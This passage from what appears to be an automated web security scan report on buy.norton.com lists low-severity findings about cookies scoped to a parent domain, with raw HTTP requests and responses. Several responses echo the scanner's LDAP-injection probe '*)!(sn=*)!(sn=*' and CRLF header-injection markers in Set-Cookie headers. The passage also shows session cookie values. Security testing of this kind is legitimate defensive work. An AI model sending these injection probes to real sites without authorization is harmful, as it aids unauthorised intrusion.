Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:30 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 137137

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.11. http://buy.norton.com/estore/mf/upgradeRenewal previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/upgradeRenewal

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199 HTTP/1.1
Host: buy.norton.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; BIGipServerbuy1_prd_SSL=4046749583.16671.0000; symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; AKNORT=0; mbox=check#true#1315621970|session#1315621887128-280442#1315623770|PC#1315621887128-280442.19#1316831510|profile#+_COUNTRY-US+_LANGUAGE-en+_TRAFFIC_SOURCE-trf_id%3Asymcom+_PGM_TYPE-UNKNOWN+_SUBCHANNEL-Online%20%281st%29+_ORIG_SUB-Online%20%281st%29#1380421910; s_eVar63=%5B%5B'store%253Atrf_id%253Asymcom'%2C'1315621909811'%5D%5D; s_eVar65=%5B%5B'store%253Aonline%2520%25281st%2529'%2C'1315621909812'%5D%5D; s_cc=true; s_nr=1315621909816-New; event69=event69; s_eVar70=%5B%5B'23440%253A0%253A0%252C'%2C'1315621909824'%5D%5D; s_sq=%5B%5BB%5D%5D; COUNTRY=US; LANGUAGE=EN; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; LASTTIME_CV_DATE=Sep-09-2011 14:31:20; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st)

Response

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=6096FB79-2899-3CBF-0291-6529FB9376B7; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:38:20 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=6096FB79-2899-3CBF-0291-6529FB9376B7; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 41047

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.13. http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=6BFF5F18-81A0-7426-AE16-067CCC63D696; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/
sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:38:17 GMT
Pragma: no-cache
Location: http://buy.norton.com/estore/mf/errorProductNotFound
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=6BFF5F18-81A0-7426-AE16-067CCC63D696; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/
Set-Cookie: sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/
Content-Language: de-CH
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 299

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/er
...[SNIP]...

9.14. http://mbox3.offermatica.com/m2/verisign/mbox/standard previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://mbox3.offermatica.com
Path:	/m2/verisign/mbox/standard

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

mboxSession=1315621455064-973488; Domain=offermatica.com; Expires=Fri, 09-Sep-2011 21:56:52 GMT; Path=/m2/verisign

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621580604-481541&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_TS_Main&mboxId=0&mboxURL=http%3A//www.verisign.com/trust-seal/index.html%3Ftid%3Dgnps&mboxReferrer=&mboxVersion=31 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

HTTP/1.1 302 Moved Temporarily
Server: Test & Target
P3P: CP="NOI DSP CURa OUR STP COM"
Date: Fri, 09 Sep 2011 21:25:51 GMT
Location: http://mbox3.offermatica.com/m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621580604-481541&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_TS_Main&mboxId=0&mboxURL=http%3A//www.verisign.com/trust-seal/index.html%3Ftid%3Dgnps&mboxReferrer=&mboxVersion=31&mboxXDomainCheck=true
Set-Cookie: mboxSession=1315621455064-973488; Domain=offermatica.com; Expires=Fri, 09-Sep-2011 21:56:52 GMT; Path=/m2/verisign
Content-Length: 0

9.15. http://buy.norton.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.norton.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
TrafficSourceCookieName=trf_id:symcom; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?trf_id=symcom&inid=us_hho_errorpage_to_store HTTP/1.1
Host: buy.norton.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1315621948|session#1315621887128-280442#1315623748|PC#1315621887128-280442.19#1316831490; s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Date: Fri, 09 Sep 2011 21:31:16 GMT
Location: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=f7d3c8fa-e003-4390-a682-049bba2b3c7d1315603876608
Set-Cookie: COUNTRY=US; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=en; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: TrafficSourceCookieName=trf_id:symcom; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 413

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/la
...[SNIP]...

9.16. http://buy.norton.com/ps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.norton.com
Path:	/ps

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:37:23; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ps HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:23 GMT
Location: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=18a29e71-5447-4147-9046-865f8a1fce521315604243554
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:23; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 413

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/la
...[SNIP]...

9.17. http://buy.norton.com/special-promotions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.norton.com
Path:	/special-promotions

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /special-promotions HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:25 GMT
Location: http://buy.norton.com/estore/mf/landingPromotion?rdid=4d1e0611-4d59-4d29-9f22-ad1cbf72a98d1315604245447
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 401

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/la
...[SNIP]...

9.18. http://buy.norton.com/support previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.norton.com
Path:	/support

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

COUNTRY=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
LANGUAGE=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
CurrentSubChannelCookieName=Unknown; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /support HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:38:21 GMT
Location: http://www.norton.com/onlinehelp
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Unknown; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 259

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.norton.com/onlinehelp">
...[SNIP]...

9.19. http://buy.norton.com/upgrades-renewals previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.norton.com
Path:	/upgrades-renewals

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:31:20; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
TrafficSourceCookieName=trf_id:symcom; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /upgrades-renewals?ctry=US&lang=EN&trf_id=symcom&inid=us_hho_errorpage_to_store HTTP/1.1
Host: buy.norton.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
